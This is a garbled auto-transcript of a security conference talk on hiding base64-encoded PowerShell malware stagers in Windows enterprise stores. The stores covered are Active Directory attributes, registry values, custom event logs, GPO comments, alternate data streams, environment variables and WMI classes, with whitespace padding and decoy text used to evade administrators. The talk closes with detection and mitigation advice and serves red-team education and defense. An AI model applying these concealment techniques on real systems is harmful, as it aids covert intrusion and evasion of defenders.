Having your pick of the litter: Storing Malware Stagers in Enterprise Services

all right so welcome welcome to having a picket illiterate or malware stagers and Enterprise Services this is a very windows heavy Oh a little bit about myself I'm with the Department of Defense been within roughly eighteen years started off as a system administrator moved into sock defense if you will about six years ago let an incident response team through a number of high visibility incident and then moved over to vulnerability assessment Red Team if you will and now I'm going to the director of an operation center where we do both vulnerability assessment Red Team and incident response I'm a adjunct sub security professor and a local college down in the gusted Georgia that's why I come to you all

from I developed a number of red and blue team tools I like PowerShell you'll see that throughout this and I'm out throwing the interwebz in a couple of places alright so here's the agenda well really highlight really the history of such talking about some malware talking about the kill chain or a methodology will go through utilizing said methodology or tactic to to hide stagers and enterprise services and then I'll end this with a demo in which I'll highlight or really walk through each one of those all right so first we got to kind of start off with definition so this whole malware thing all right what is it well you see a lot of text up there but

really the meaning potatoes of it is is that malware is gonna be an actual piece of code developed by somebody to actually inflict something on a person's machine whether they want to actually take it down whether they want to take over it but nonetheless it's gonna be code at heart it's kind of interesting when we think about malware now there's different variations of it but before we even get into that let's let's talk about where it all started well roughly back in 1971 there was a guy by the name of Ben Thomas who actually developed the creeper malware and literally what it did is right through the screen I'm a creeper catching me if you can and it propagated

by hand it was very manual in nature we're talking floppy disks right can't even find a floppy disk these days I say that like some organization still have um but that's that was the first piece of what we know to be malware and it relied on human interaction that's kind of interesting because now today we don't see human interaction being a necessity as much right and today we see things that are much more sophisticated right much more streamlined may be broken up to different phases if you will and they're constantly evolving it's a constant cat-and-mouse game from a defense perspective you're consistently trying to highlight what adversaries are doing trying to put things in place in which you can

articulate and really highlight the activities that they're doing and as a red team where vulnerability assessment person you're just sitting there trying to find some loophole buzz that software and find something that allows you to gain some code execution and even better a shell a root shell is really what we're after right but it also has some financial gain with it because we have criminals doing it for the purpose of financial gain we have government's doing it right trying to get after the political game and in all honesty it's almost like a silent war happening that we don't see on the streets or really see as much in the news and let's it's some wine owned

company of source so when we look at the common types of malware all right we see what's before us and generally speaking I think worms and viruses are kind of the thing we previously always thought about when we mentioned malware but now we see a lot of rant so we're definitely financial game right where somebody's trying to get code execution on the system they want to encrypt the drive they want to hold the system for ransom we see root kits that's always been a thing all right there's user mode most common there's actual kernel level very sophisticated right at that point it makes it a little bit more difficult to trust the system to really even identify

it and then you have like a hypervisor version of it so we can get in the inner workings of actual working with virtual machines Trojans kind of go without saying key logs are definitely much more prevalent especially when you think about people trying to do things for financial gains or gain in execution or access to a machine then we have great we're right adware spyware the bloatware that comes on brand-new computers if you will those are rare we're gonna be around but all the malware has to have some very have to have some method to hide all right unless you're like Rick James and you don't really care typically you're gonna want to hide your malware and some

typical aspects to do that is you're gonna use some type of packer maybe A to B X or something else where you want to add your malware in with some legitimate program maybe you want to use a new krypter in which if somebody was trying to re a to reverse engineer then that payload and aspects of that data may be encrypted may be much more difficult for them to actually understand polymorphic much more sophisticated consistently changing its data set and itself as it traverses right think of how signatures are ever gonna find that heuristics um good luck right so polymorphic is definitely much more sophisticated then we have stagers they've definitely on the rise and this allows us to really

survey a machine or do something to a machine before the real malware come right so we can all think about some sport maybe it's boxing there's the main ticket and then there's these other people who are boxing before the main ticket we can almost think of those other folks as the stages right there prepping the battlefield if you will getting everybody height or the real deal and the real deal is gonna be the malware I wish the stages come give so a little bit more about these stages we know the mesh droppers downloaders but nonetheless they're they should be tiny all right you typically would not want to use a full mega to payload as a

stager but generally speaking if we're going to exploit on if that is the method in which we're going to use to get on the system we may have a little minute limited amount of space that we can actually use for our payload and this is where stage are actually coming good with us and once we get access to that machine our stages should allow us to actually interact with that machine ie our stage will that machine contact us so we can then either task it for something else or send an actual real payload that's gonna actually sit residue on the system now the big thing about this is it allows us to break down our toolset

malware development is really expensive either money-wise or man our wise but nonetheless I'm not gonna free willy nilly just throw my payload all over the place and see what sticks I want to get on a system survey it understand if it's even a good candidate for me to do something with it and then at that point then lay it down right maybe my surveying is what type of antivirus they have on there what's the state of the system is this a system owned by somebody like my mother who doesn't know much of what's going on in the system or is this some aspiring young computer science or some type of admin a person who's really into the

machine now looking at the delivery mechanism we have something like this we have the system being exploited in our stage or being part of it and then we have the system reaching back out to our c2 server generally speaking when that system reaches back out is probably gonna be on some type of well-known port in which general client machines would talk on right so I probably wouldn't have my stage ever hosted at you know quad floors or something like that in that case would blend in a lot more with normal traffic but when it reaches back out and we're talking that military there then I may have something else for it to grab and it could be virus worm

something else right it could be just other instructions but nonetheless it's like that main ticket or that heavyweight fight right my system is gonna I'm sorry that systems gonna then reach out grab whatever that next stage is once we have that we're gonna set up some type of encrypted c2 channel where periodically every or whatever the case we would then have the ability to interact with each other generally I wouldn't have that c2 server actually initiate communication with that implant or whatever my follow-on payload is I'd have this guy on some period of time random period of time like I don't want the periodicity to be so clear-cut where you could be like hey every three hours

on the dot this thing is actually reaching out with some periodicity in which this guy may come out check my c2 server see if I got anything else for it and then execute the mother who common task goes without saying I want to survey it what is this data the machine I may have some other payloads that I want to lay down but I want to ensure that that system is has the requisite software installed or maybe this thing doesn't hold any true wealth for me to be able to do something follow-on within the organization this also allows me to validate whether it's running in a virtual machine or not right maybe this is some honeypot of stores or if I

understand that organization and most of their stuff is virtualized then I could really deem that is normal if you will the other thing about issues in a stager is that additional payload we reach out to grab we could actually inject that into memory reflectively inject that DLL and at that point our DLL wouldn't touch disk the work being a little bit more stealthier in that aspect when we look at just a generalized methodology of sorts we can refer to the cyber kill chain cyber kill chain has been around since roughly 2011 developed by Lockheed Martin and there are a number of methodologies that all kind of articulate the same thing but ultimately just highlight really how somebody would

look to do something so the interesting thing about this is this is gonna be linear in nature every step is almost required for the next so if I had my young child here you know my little five year old and I was chasing him it would be me trying to catch up to him instead I'm gonna try to pass him get in front of him so I can then block him or entertain them or whatever it is my goal is so the goal here are really idea here from a defense perspective if you can identify the methodology in which an attack or an adversary would take you can then get ahead of them so that way

you're not sitting there trying to follow but you're more or less getting around and then blocking stopping identifying a mitigating aspects of which they would need to achieve the further go along we're really gonna focus on here though is not the exploitation perspective we're gonna focus more on the installment piece where we're actually going to lay something down and then we're going to utilize that to communicate back with Darcy to serve all right a common tactic to do this I wish I had disclaimer here because this is not the only way it is one of a few ways to actually get off through it it's almost like eating a rhesus right there's no long way to really do that

unless you dip it in milk that just that's not right oh so a way to do this is we'll take whatever our data is we'll convert it to bytes well base64 and then we'll store it somewhere so the premise of this talk is utilized in Enterprise Services this is specifically Microsoft we're gonna utilize the very things that Microsoft calls features and we're gonna store some code there this code today is gonna be benign it's just gonna print a string back to the screen to let you know all those well but this approach is very post exploitation all right this isn't telling you how to get on the Box you're already on there now you're looking at the next stage and this kind

of fits the category of paulus if you know the interesting thing about this is what we're going to lay down is our stager is going to be an IP address or it could be a URL and then we're gonna lay down a URI off after that actually specifying the file that we want it's a download so what do we lose if that gets burned well I lose an IP address if I'm using an IP if I'm using a domain I lost the domain I can go buy another one for a dollar ninety-nine cent and then whatever I specify is the file that I'm downloading I could lose that name right that doesn't really help a defender because today the file that

I'm gonna host is call it stage or dot ps1 but if you ask somebody what's in that file nobody would know unless they went out there and downloaded the sample of it so what are you really losing right I'm lessening the surface in which I is an offensive person could become burnt or show my hand as to what I'm doing all right so we'll start with Active Directory Active Directory from an enterprise perspective that's gonna be the authentication authorization mechanism for user accounts throughout a network same thing with computers Active Directory is a structure in which is typically a raid of objects and the most common objects are the users computers and actual groups now the database

itself is stored in system 32 and TDS that so if we were trying to take over an organization maybe dump some hashes it's not about us getting the same high because that's gonna be local and enterprise we would want that that's another top the big thing about this is when we look at Active Directory users and computers we see the top screenshot there cool we see things like Oh use organizational units and then we have sub oh use there as well and in each under each one of those organization units we may have other objects in this case we have some users we have some groups we also see some sub organizational units as well interesting

thing about this is people aren't typically quick to create users they're not always typically quick to delete users or if I move from one section to the next they may give me or change my rights it may not go back and take those so we see things like privilege creep and a number of other things come up but from a GUI perspective that's how an admin may look to actually access Active Directory we can utilize something like PowerShell and access Active Directory as well and we see the same names there that we see as part of that oh you there if we were to click on an actual object we're presented with a number of

properties about that object roughly there's about 50 of them if we go tab the tab we'll see these properties and generally speaking each one of those properties has the ability to store some amount of data whether it's one character 512 right it just really varies from field to field now there's also a number of fields that are not shown by default generally speaking in each one of those tabs if you're familiar with acting director you can go along the toolbar and actually enable advanced features and you'll get things like attribute editor now an attribute editor will be able to see the fields that are not typically shown by default and I'll highlight that is I do the demo so when we looked at

this user we're looking at the same stuff within powershell so this is good because if we can get our code in there our stager domain users by default have the ability to read objects in Active Directory so that's cool now I can almost beast using this as a file share if you will and I can go from box to box and have that user read that actual account and grab that code so now we we kind of moved to the registry registry goes without saying it is amazing from a defense perspective it's awesome for forensics and artifacts from an offense perspective it is like a kid in a candy store they're just too much right so if you've

ever been an admin I can tell you about every key in the registry I'd be interested right because there's just way too much in there for any one person to be able to know every particular key so if that's the case that makes a good place for us to get our code in and the fact that we can get our code in allows us to really skate under the radar a little bit more now when we look at the registry we have the hives that sit on disk and then we have the hives that are loaded into or what they assemble into in memory upon the system booting up or this or somebody actually logging in so

and the users profile there's an into user that that is specific to the individual user when he or she logs on it becomes their HBCU and then we have a system 32 we have stuff like hklm I'm sorry a software system those along with a number of other ones become what we know is hklm now we also see the linkage between those items so we have our hives on this on the left and then we have what they become and memory on the right the good thing about this or not really the good thing is if we were trying to affect the security hi when the system boots up it gets loaded into memory and

it's locked all right so that's really really good in the sense that we know it's gonna get used it's gonna be loaded in so we can get code in there it's a high availability method for us to actually use if we were just looking at the registry we're used to seeing reg editor right and for us to store code there I like to go several layers deep I like to look for just random places I don't even care what the key is really used for all right because the more deeper is less likely somebody's gonna be looking at it so in this case we're not very deep but we're in the users hive were within software and then

sysinternals and then I see a key for the EULA so they've used strings before and they accepted that EULA and then I can look at the same data by utilizing PowerShell and I see the EULA highlighted there the short here is we're showing that you can utilize the GUI but you can also utilize the command line this is gonna be key once we get into the demo piece because largely everything I'm gonna do is then command line and then we'll go back to what it looks like in the GUI because that's what most admins are gonna be utilizing so have event logs so this is gonna be detailed records of things happening on the system generally speaking we have

audit entries that if enabled were right to event logs if somebody was gonna wipe an event log it would generate an event 11:02 so that gives some reassurance to an admin that if they can write stuff to the event log they have a good record the interesting thing about this is there's a huge amount of event logs like huge right we see where those event logs are stored at on this there are some tactics to wipe event logs in a good way actually I can't think of any good reason why anybody would want to do it but if we were doing it from an adversary perspective there's a couple of tactics that we can do it without

admin being able to see it they do overwrite themselves so an admin likely would have something write to the event log and then ship it off to like Elks Blanc or whatever their centralized log aggregation server is but when we talk about there's a huge amount just looking after a server 2016 virtual machine I had deep bought nothing special i had a roughly 380 unique Long's not talking about log entries we're talking about unique logs now generally admins know about security system application may be some small other ones but I don't know how many people can name more than 15 20 logs that are actually in the system so the fact that we have several hundred gives

me some pleasure and utilizing this now reading an event log we would use Event Viewer the GUI aspect and we would see an actual message and we see some other data about it we can utilize power show as you see below to essentially read that log as well now if that's not enough for you you have the ability to write custom logs so from a defense perspective maybe I have my dev shop who developed this in-house tool and they didn't build in any inherent logging so now I can utilize something like PowerShell write my own custom logging to get it in the event logs from an offense perspective I see a place in which we create our own event log that

could we already got 385 what does it matter we have 300 86 right we'll just add one more on to it and now we can write our code there and go back and retrieve it at another time reading it is such like this so I've made a new event log or actually I made a source within the application event log and then I wrote just an app has started and then when I go look at that an event viewer I see the actual message that I depicted and then I also am able to read that very same thing utilizing some power ship we have group policy so group policy is gonna be that that infrastructure that

utilizes implement specific configurations across an enterprise all right I remember my time as a as a helpdesk person right they told me I had the most important job in the organization that was right before they gave me the most work in the organization right it was like hey we need to update these machines and we didn't have centralized management so I was walking around with my disk now I'm dating myself I had city booked but all kinds of software and I realized that was no way to treat a human being right and you know we have things like goo policy where we can set it once and didn't have those settings proliferate across an organization so it's a

wonderful thing and then again we find areas that we can take advantage of it from within Microsoft group policy itself there's an enterprise management perspective through policy management and then we have the local machine has a local group policy editor as well so we're gonna look at doing it from a enterprise perspective that's gonna give us the most bang for the buck but either one of them will suffice and the way we're gonna do that is we'll look at the group policy management from a server perspective I have a default domain policy which every domain would have that I don't care if it's enforced length or not but we have this think all comments and over there I've never seen

an admin actually used it ever so for this uh for the sake of this screenshot here I just put in that this is the default policy link to the domain or whatever the right I'm gonna put text there now but we're gonna utilize that area to store our code awesome now before I lay any code down I'm gonna understand the infrastructure to really highlight would this tactic work like I'm not gonna go to every machine and try to use MSO eight zero six seven right because that's not gonna work everywhere but I would want to understand targeting which I'm interacting with now our next one is alternate data stream and some of you may be like man really yeah hey it still

works all right just like that at six seven one I just talked about so alternate data streams resident within NTFS filesystem I'm generally speaking that's what our systems are going to be or Windows perspective um we have the ability to really add in the stream of data if you will and if we looked at the size of the file our data stream size does not affect our actual size of our files so that's good now this was really developed to have any capability match with Macintosh systems but it's still something that's available so every file has a dollar sign data stream and then we have specific files depending on how your system is a raid but we could also

have zone identifiers have you ever been downloading the file try to run it and a pop-up said hey be careful this came from the internet you shouldn't trust stuff blah blah blah well that was a zone identify 80s that was attached to your file Sam that zone 3 or 4 whichever one it is that tags it saying it came from the Internet that's what highlighting or really stopping you and prompting you it's that zone identifier 80s that's being tad so an example of this is really good so I have a file that I created and right now it has zero bytes I created an alternate data stream that I'm gonna call my stream and I'm gonna put my

son's favorite write dr. Seuss in there and right now the length of that is $35.99 but still the original file the donor if you will is still that zero bytes so if I'm gonna use this I would look to want to do it on a bow that I know that's gonna be there right and one for example not the only one is the host file right the host file if I'm going to try to sinkhole a domain or maybe redirect something locally then I could utilize this host file and put in an IP in an actual domain but regardless of what's in the actual file itself I'm just gonna be a straphanger with my alternate data stream and really this

thing it's gonna be a donor form we have environment variables they're gonna be dynamic in nature so we were using the environment variable username I'm sorry user profile it would really highlight the profile path for the user that you're logged in it for example if I'm logged in as a user called wolf and I said hey change directory to environment variable user profile it was dynamically set to that environment variable that might use a profile that's the path of see users wolf blah blah blah alright so it can be dynamically set and this is good now we also have the ability to have user environment variables and system ones we're going to look to get in the system one so that

way it doesn't matter per se which person there's a lot of information that's being utilized here to really set what's going on in our operating system and the same could be said about whatever programs we have installed there the same way we have our environment path we can add other things in so in this case we have our user environment variables up top I have the system ones that are down in the bottom these user ones are in my NT user diet that for whatever user it is that I'm logged in as and then these system ones are part of hklm from a GUI perspective a more from ingoing perspective I have where I can

go into properties of computer and then I can see up top my user environment variables and down below my system ones so we're gonna add one into our system one we'll come back and check this screen and we'll look at what an admin would actually see and how he or she could actually highlight that we have something going on and we have a WMI and sim alright so from this perspective WMI was Microsoft's implementation of W bean so w bins like how we're going to share information across a subset of machines within the last couple of years Microsoft has gone away from that and went to sim which is common information module or model both of them somewhat do

the same thing WMI is gonna use decomp sim is gonna use a thing called WS man but ultimately the namespaces and classes that were accustomed to from W and Mark are still available so we're gonna take advantage of that in the sense of we have these classes namespaces that have a particular set of information about them so these classes has properties and methods and properties are nothing more than attributes methods are nothing more than actions and then if we want to interact with them from a GUI perspective on our system W beam has an actual executable assistant 32 that we can connect to our machine and access all our namespaces and classes and we'll highlight that too

in our demo as far as how an admin can see that but when we talk about the sheer amount of them is gonna vary from system to system just like when I add a particular piece of software on my system it may add a new registry key the same is or WMI and sim as far as classes so on the machine that I ran a demo on I had roughly 10,000 right refer back to my comment about the registry if I can find an admin that can tell me about more than 10 classes I would be I wouldn't be shocked I would want to actually talk a little bit more right but 10,000 that's a lot just on my system so if I have

10,000 112 what difference is it gonna make if I add one more to it alright and that's what we'll do this is gonna help us with storing our code having it in the place in which an admin largely it's not going to see it so that makes it great for us when we want to come back and actually grab

okay so now we're going to demo and and think this port through is I didn't mirror it so

you you okay you all right cool so I have another machine that is running a web server and this web server is really dirty it's really dirty in that so you heard of a Python on simple HTTP server all right so we did the same thing in PowerShell we're talking 19 lines probably get it down more than that all right so it's really quick and dirty it's HTTP I can add a certificate on to it if I needed to but nonetheless I can utilize something like invoke web request and I can access that server so I'm just ensuring that I have access to it I see I have a status code of 200 cool so I'm gonna take what is

really my stager and it's that bit of code that bit of code where I'm going to reach out download whatever is being held there and I'm gonna store it in the context of memory so that whole string itself is going to be my stager if this gets caught I lose an IP address I lose that I was reaching for something called stage or ps1 but honestly I couldn't call it it 1 2 3 or ABC Mickey Mouse or whatever right or not United States or whatever right cool so I'm gonna go through and I'm gonna take that string I'm gonna convert it to bytes and then I'm going to convert it to base64 and then I had that base64 code so now

there's my off you stated string in which I'm gonna lay down in a number of places as you see I have it is encoded text so as I go through these examples I'll be storing encoded text the variable and all these random different places and it will call upon it so I'm gonna utilize this person Nick shank and I'm gonna look at a couple of properties associated with their account right now we see employee ID employee number division those are the three I called upon and they have nothing their division can hold 256 characters I want to say employee numbers like 512 employee IDs like 16 and there are many more that you can find but those three

aren't available by default so what I'm going to do is go into Active Directory and I'll go into Schenk's computer I'm sorry shanks account and I'll come into attribute editor when I come into attribute editor you you I noticed that division has nothing there so that is the one place that an admin would see it in attribute editor now I would have had to essentially do an advanced view and I don't know admins that just scroll down attribute editor like oh let me see what's going on in here so if that is the case where an admin is gonna do that then I'm gonna get a little bit more stealthier but first I'm gonna store this base64 code there we'll

look at what it looks like cool so it's there from a command line perspective from a GUI perspective

we now see our base64 code and depending on the target I might be like cool it's there let's go or we may want to get a little bit more stealth there with that so we're going to push that down a little bit and what I mean by push that down is I'm gonna Pat it with spaces right I'm gonna push it off the screen so that way it forces an admin to actually interact with it to know what's there now I said division takes 256 characters right employee number takes 512 so if I'm already gonna Pat it with 250 blank spaces then I'm gonna now put it in employee number now when I go back in here and I look at

employee number we'll see what that looks like so employee number shows blank but notice everything else around it that's not set right it actually says not sit if an admin gets to this point it was like huh why does that one not said and why does it doesn't have anything else next to it and they want to double click it oh you got right so let's go a step further with this we're gonna actually add in not set so we're gonna add in not set we're then gonna push it down 250 white spaces and then we'll add in our text so I'm gonna now overwrite employee number with that so we'll go back in here and we'll look at that so now when

I look at employee number nothing to see here right now look if an atom is gonna go double click every one of these look bro you gotta write like you have no real job right but now when I go in here to actually interact with it I see my code I see my whitespace and I see not set I've pushed it off the screen making it more difficult for me to find now when it's time for me to actually execute this what I'm gonna do is call upon that property I'm gonna trim not set and I'm gonna get rid of the white space there and I'm gonna actually feed that base64 the PowerShell and what I

have this stage or that ps1 is nothing more than that green text saying stage and test right call it a proof dot text on the desktop if you will the old STP Amazon all right whoo so that's a way for me to do it now if I was if I get a new guy on my team right everybody's got a cut they teach somehow so by hey man welcome to the team hey check this out we're working on Active Directory I need you to go through every property known to man kind of research and find us a property that we can throw data into right good luck right we all have to like start somewhere so that's a way for

us to do it now from a registry perspective I'm gonna utilize this key called console and console itself it's like super random I just scroll down in and found it somewhere

that's how random is now I can't find all right cool so there it is so we see nothing's under console other than something that says default that's awesome so I'm going to create a new item there and I'm gonna call that value updater 32 and then I'm gonna store my code there well why are you calling the updater 32 because let's be real here if you add 32 and 64 people will make themselves feel like it's legit yeah looks legit it's got 32 on it all right so we come back in here we look at this and you're like that's ugly now we'll go back before cuz I'm like bro this thing is like six

layers deep ain't no way I'm ain't gonna find that yes they will okay fine we'll do something similar like what we did before we're gonna push that thing down in this case I'm gonna do updater 64 I'm gonna Pat it with 250 white spaces and we're right there as well so when we come look at this we now have that so if an admin is at a point where they're looking at registry keys and they see the key with no value and they want to click on it really I guess they're indication there these three dots here but if they get to a point where they see this and they want to click on it

then cool I guess they'll stop there but if they're really nosy they could scroll over and see my code now if I want to make this blend in a little bit more you see how we have this key default and it says value not set that seems really legit so I'm gonna do that alright so in this case I'm gonna do app cache 32 I'm gonna add in value not set add in my 250 white spaces and I'll add in my code so now when we have this we have value not set we have some three dots out to the side so that triggers them so be it but when they click on it we have value not set all the white

space and then we have our code so if I get this in such a place where a rest is short no admin is looking forward depending on the defenses I feel like I can get around it when it's time for me to call upon it I'll trim that white space and everything else associated with it and I'll be able to execute it now from a event log perspective I'm gonna create an event log a brand new one it's not gonna be system security anything like that I'm gonna create one called Windows Update so that is really legit and I'm gonna utilize a source call updater 64 so now that I created this event log I'm

gonna write data to it and the data I'm gonna write to it is gonna be an event ID of 10 and you guessed it it's gonna be my base64 code so when I come in here and I look at this we'll be able to actually see it you okay you ever had a talk with the demo gods and it was like yo bro I got you you're gonna be good all right there's my updater 64 or my windows updater when I look at that I got basic before sitting right there right so I'm like cool there's 386 logs now what if they see this and I'm also doing this in my own log because if I did it in the

application and everything else we've already said it's gonna roll it's gonna overwrite so I don't want to lay down something today try to come back and utilize it tomorrow and then like the network had so much activity that my log or my entry is now rolled so we'll add some white space in there all right cuz white space saves everything when we come back in here now and look at our next entry we see nothing there we scroll down we'll see our code so now what I want to do is I want to essentially when I look at like an application log or something there's some text there and I'm good I typically don't interact with it we're trying to

scroll down if I see text whitespace I assess that that's the end of it so what we're gonna do is try to get past a human nature in that same respect and I'm gonna say an update was detected we'll add in 50 white spaces in our code all right surely if this is the Windows Update err event log surely something like an update was detected is legit so now we come here we see an update was detected if they scroll down they'll see my code but at that point I feel pretty good I'll sleep good that night I may worry the next day if I'm waiting on the beacon and we're like three minutes past

that time I might go smoke a cigarette now any smoke all right so cool from an event log perspective and the same thing when it's time for me to actually run it I'm going to call upon that entry I'll trim all the white space and everything else that I have on there and I will let it rip now from a event log perspective we have the comment field there's not a way from the GUI that we can edit to comment though it would force somebody if they're gonna use it to utilize the command line so for us to get after this we're going to read in or call upon the default domain policy I'm going to

change the description with you guessed it my text and now when I come look at this I'm like whoa that can't be good right because even if an admin is just quickly browsing through getting ready to interact with it something like that may stand out so you can kind of see what we're gonna do here we're gonna suppress everything now before I was able to use backtick in for new line but for some reason backtick end did not work here so I found myself almost like I was trying to overflow a buffer where I was writing in like no characters like Oh Craig I can still see it let me do another okay now I can't see it that's the magic number

cool so I added in roughly 40 or so blank spaces and then we'll be able to actually write it there so we'll execute that you cool now we'll come back in here and we'll look at it and we see it's now off the screen awesome if we want to actually call upon it or just read it we'll see something like that well we have all this blank space and our code if an admins reading a group policy objects utilizing command line like this our mileage will vary but when it's time for us to execute you guessed it we can trim everything and be good to go from a host file perspective I'm gonna just call in or read in that

string and then I'm going to add content to that file a value of my base64 code and I'm gonna add it to a stream called zones right why zones because it felt good on my soul um when you look at this right just looking at what uh ATS is are there we'll see something like this and if somebody's looking that data dollar sign data is gonna be the default one and I just added in zones because it felt good it looked good smell good all that good stuff so now I'm going to read in that data and then I'm going to pass that to PowerShell so I can actually have it execute all right all right all right so

we got two more the second to last one here is going to be dealing with environment variables so when I utilize PowerShell to affect part environment variables I'm going to create one but it doesn't persist past my current session and I'm also gonna create a system one but it needs to restart this the system needs to restart before it kicks in so this first one is creating a temporary one and then that cept second one creates my permanent one but it again won't kick in into the system restarts what I'm gonna do is come back over here and really look at where that's at so I have a number of things that are there and we see the one that we created there

was already a w6 six four three two so I created a w6 for cuz it felt good but again it stands out if somebody's looking at this so we're gonna Pat it with some white space awesome come back in here look at it and now we have this ugly blank one so instead of us doing value not set here I'm gonna use a donor if you will I'm just gonna copy what six four three two has its entry also save it here and steadily have my white space and push down my actual code so I'll read in what six four three two has and then I'll execute nearly the same thing starting that entry off with

the code that six four three two has and when we look at that we see our w66 with the same thing as six four three two and if we were to open it up and interact with it we have our code we have some white space and then we have C Program Files common files ultimately I want an admin if they're gonna investigate this I want them to feel like there's nothing to see here just keep moving right I also want to be a snitch and be like hey man don't look at this event code um go look at I'm sorry this registry key don't look at that one over there that's who you're really looking for when it's time for me

to run it trim my whitespace and be good to go from aw on my sim perspective again roughly 10,000 on my machine I'm going to create one called win 30 to defend 64 cuz largely locked a decent amount of the classes begin with win32 so I want this to blend in I'm going to create a property called path and I'm gonna store my code there and then when I go back to read it I'll be able to see my code now this class is now one of 10,000 plus entries on this system when it's time for me to execute it I just called upon now I don't feel like I need to further off you scape that if

somebody wanted to actually look at these classes a little bit deeper and they knew which one they were looking at they could actually use this program inherent to Windows and from here they could specify recursively all roughly 10,000 or so or they can do the immediate ones in that namespace and from that perspective they can then scroll down to something that they're looking for maybe get to a point where they see when defend 64 notice we don't see our code there and if they had a WoW hair they could then interact with it come down and they would see the property in which we've created lots of work that's good you you you you

all right so as you see there's a number of ways for us to do this now you may be wondering well people really using this hey look from the objective perspective oh don't trust what I'm saying let's look at what the data say right says so we have a number of organizations the nation-state hacktivists whatever you want to call them that are utilizing stagers in some form of fashion alright and this is just a small list when you think about it it only makes sense like why go all in when you can kind of taste the water a little bit to make sure it's what you want before you put your hard-earned equity on that actual system

now we do have some pros and we have some cons so the pros very lightweight could be low equity absolutely because again if I lose that what do I lose and domain maybe an IP address maybe you know just a name of what I call the foul and that doesn't even mean anything it's modular so I have this stager that literally goes and has one job and then depending on what it brings back to me for information I could have a module that then surveys I have a module that's a key logger I have a module does this that's this right so it's very modular in nature where I don't have to bring everything at one time and literally my

c2 server could be hosted anywhere the same with my stager it's like if there is a place for me to store it in Windows and there is a million places they call it features um it's a place in which I can go back and grab it now with that there's some work that has to be done to even get to this thing we're talking post exploitation so if you can't even get in the door you won't even get to the point of using it and some defenders are better than others we can all agree with that so as we begin to use this really it's visible then next stage of our retrieval it's going to create a

connection so if there's real decent logging and somebody is actually looking it could highlight if the organization has a good EDR we could be seen as well right this is where you understand the environment and then you pick which tool is applicable or to tasks at hand we could have ourselves we could find ourselves rather in a place in which our c2 server is blocked if we're using a domain or really even an IP if we're using a domain if the organization finds it they could sinkhole the domain and really new to our communication so there's a lot riding on issues in a stager and at perspective some detection mitigation strategies well proactive threat hunting like come

to work and actively go look at stuff on your network assume breach well it's quiet that's because they're good I'm telling you if you go look you'll find stuff all right reputation based web analysis what does the rest of the community think about this domain or this file or whatever case what is the rest of what is my organization think about it in the sense of is this file resident somewhere else am i my system mitigations least privileged segmentation isolation application whitelisting it hurts what man if you do it it's worthwhile right somebody still can do some nefarious stuff but at the end of the day we're making it harder for them it goes without saying patch

patch patch all right so cool now I'm on the down stream right making my descent down and I gotta get these shameless plugs out right it is what it is I apologize right so you see me use a lot of power Schiller you guess it I like power shield so I run a site called under the wired I tech myself into other people and been around for roughly 20 since 2015 we've had over 90,000 people play from 78 countries when I google how many countries there are I get somewhere between 192 and 196 either way I'm pretty happy with those stats it's free and it's persistent it's going after the core aspects of the language so if

you're looking to utilize the language a little bit more because you maybe thought what I was using it for was pretty cool then here's a way to kind of get after it now if you feel like you know the language I also run a site called posh hunter so Posh hunter is very often sand defensive-minded I'm gonna put you in a scenario in which are either a defender or your vulnerability penetration tester and you're going to answer questions utilize in an operating system or a Windows instance that we're providing all right so if you have questions I'll step off to the side and answer them if there is anything that you want to take a picture of this is it when I get back

home to Augusta tonight I'm gonna put these slides up there if you want to interact with me on Twitter or anything there's that and there's my code so again I'm gonna step off to the side so if there's any questions I'll take them in thank you [Applause]